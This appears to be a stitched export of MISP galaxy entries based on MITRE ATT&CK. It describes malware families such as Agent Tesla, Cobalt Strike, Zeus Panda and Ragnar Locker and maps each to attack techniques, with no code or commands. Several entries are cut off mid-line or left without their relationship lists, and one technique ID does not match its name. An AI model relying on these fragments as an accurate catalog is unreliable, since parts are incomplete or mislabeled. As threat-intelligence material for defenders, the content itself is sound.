- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0016">https://attack.mitre.org/software/S0016</a></td>
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</table>
Cherry Picker - S0107

[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)

The tag is: misp-galaxy:mitre-malware="Cherry Picker - S0107"

Cherry Picker - S0107 is also known as:

- Cherry Picker

Cherry Picker - S0107 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

Zeus Panda - S0330

[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)'s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)

The tag is: misp-galaxy:mitre-malware="Zeus Panda - S0330"

Zeus Panda - S0330 is also known as:

- Zeus Panda

Zeus Panda - S0330 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 4405. Table References
SpyNote RAT - S0305

[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)

The tag is: `misp-galaxy:mitre-malware="SpyNote RAT - S0305"`

SpyNote RAT - S0305 is also known as:

- SpyNote RAT

SpyNote RAT - S0305 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0305">https://attack.mitre.org/software/S0305</a></td>
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<tr>
<td><a href="https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app">https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app</a></td>
</tr>
</tbody>
</table>

3PARA RAT - S0066

[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)

The tag is: `misp-galaxy:mitre-malware="3PARA RAT - S0066"`
3PARA RAT - S0066 is also known as:

- 3PARA RAT

3PARA RAT - S0066 has relationships with:

- similar: misp-galaxy:rat="3PARA RAT" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0066">https://attack.mitre.org/software/S0066</a></td>
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<td><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></td>
</tr>
</tbody>
</table>

Agent Smith - S0440

[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-malware="Agent Smith - S0440"

Agent Smith - S0440 is also known as:

- Agent Smith

Agent Smith - S0440 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0440">https://attack.mitre.org/software/S0440</a></td>
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</table>

**4H RAT - S0065**

[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)

The tag is: *misp-galaxy:mitre-malware="4H RAT - S0065"

4H RAT - S0065 is also known as:

• 4H RAT

4H RAT - S0065 has relationships with:

• similar: misp-galaxy:rat="4H RAT" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-
Desert Scorpion - S0505

[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion)

The tag is: *misp-galaxy:mitre-malware="Desert Scorpion - S0505"*

Desert Scorpion - S0505 is also known as:

- Desert Scorpion

Desert Scorpion - S0505 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"* with estimative-language:likelihood=almost-certain
- uses: *misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"* with estimative-language:likelihood=almost-certain
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"* with estimative-language:likelihood=almost-certain
- uses: *misp-galaxy:mitre-attack-pattern="Capture Audio - T1429"* with estimative-language:likelihood=almost-certain
• uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0505">https://attack.mitre.org/software/S0505</a></td>
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<tr>
<td><a href="https://blog.lookout.com/desert-scorpion-google-play">https://blog.lookout.com/desert-scorpion-google-play</a></td>
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</table>

Net Crawler - S0056

[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="Net Crawler - S0056"

Net Crawler - S0056 is also known as:

• Net Crawler

• NetC

Net Crawler - S0056 has relationships with:

• similar: misp-galaxy:malpedia="NetC" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
**AutoIt backdoor - S0129**

[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: `misp-galaxy:mitre-malware="AutoIt backdoor - S0129"`

*AutoIt backdoor - S0129* is also known as:

- AutoIt backdoor

*AutoIt backdoor - S0129* has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

**Agent Tesla - S0331**

[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET
framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)

The tag is: misp-galaxy:mitre-malware="Agent Tesla - S0331"

Agent Tesla - S0331 is also known as:

- Agent Tesla

Agent Tesla - S0331 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-
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• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-
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• uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-
  language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with
  estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-
  language:likelihood-probability="almost-certain"
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<td><a href="https://attack.mitre.org/software/S0331">https://attack.mitre.org/software/S0331</a></td>
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<tr>
<td><a href="https://www.digitrustgroup.com/agent-tesla-keylogger/">https://www.digitrustgroup.com/agent-tesla-keylogger/</a></td>
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**Cobalt Strike - S0154**

[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)

In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)

The tag is: `misp-galaxy:mitre-malware="Cobalt Strike - S0154"`

Cobalt Strike - S0154 is also known as:

- Cobalt Strike

Cobalt Strike - S0154 has relationships with:

- Uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1555.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0154">https://attack.mitre.org/software/S0154</a></td>
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</table>

**Ragnar Locker - S0481**

[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019. (Citation: Sophos Ragnar May 2020) (Citation: Cynet Ragnar Apr 2020)
The tag is: `misp-galaxy:mitre-malware="Ragnar Locker - S0481"`

Ragnar Locker - S0481 is also known as:

- Ragnar Locker

Ragnar Locker - S0481 has relationships with:

- similar: `misp-galaxy:ransomware="Ragnar Locker"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614"` with `estimative-language:likelihood-probability="almost-certain"

*Table References*

**Links**

- [https://attack.mitre.org/software/S0481](https://attack.mitre.org/software/S0481)
SYNful Knock - S0519

[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)

The tag is: *misp-galaxy:mitre-malware="SYNful Knock - S0519"

SYNful Knock - S0519 is also known as:

- SYNful Knock

SYNful Knock - S0519 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0519">https://attack.mitre.org/software/S0519</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/09/synful_knock-_acis.html">https://www.fireeye.com/blog/threat-research/2015/09/synful_knock-_acis.html</a></td>
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Power Loader - S0177

[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: *misp-galaxy:mitre-malware="Power Loader - S0177"

Power Loader - S0177 is also known as:

- Power Loader
- Win32/Agent.UAW

Power Loader - S0177 has relationships with:
Brave Prince - S0252

[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: *misp-galaxy:mitre-malware="Brave Prince - S0252"*

Brave Prince - S0252 is also known as:

- Brave Prince

Brave Prince - S0252 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
Smoke Loader - S0226

[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)

The tag is: `misp-galaxy:mitre-malware="Smoke Loader - S0226"`

Smoke Loader - S0226 is also known as:

- Smoke Loader
- Dofoil

Smoke Loader - S0226 has relationships with:

- similar: `misp-galaxy:tool="Smoke Loader"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="SmokeLoader"` with `estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"` with `estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

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Linux Rabbit - S0362

[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)

The tag is: *misp-galaxy:mitre-malware="Linux Rabbit - S0362"

Linux Rabbit - S0362 is also known as:

• Linux Rabbit

Linux Rabbit - S0362 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

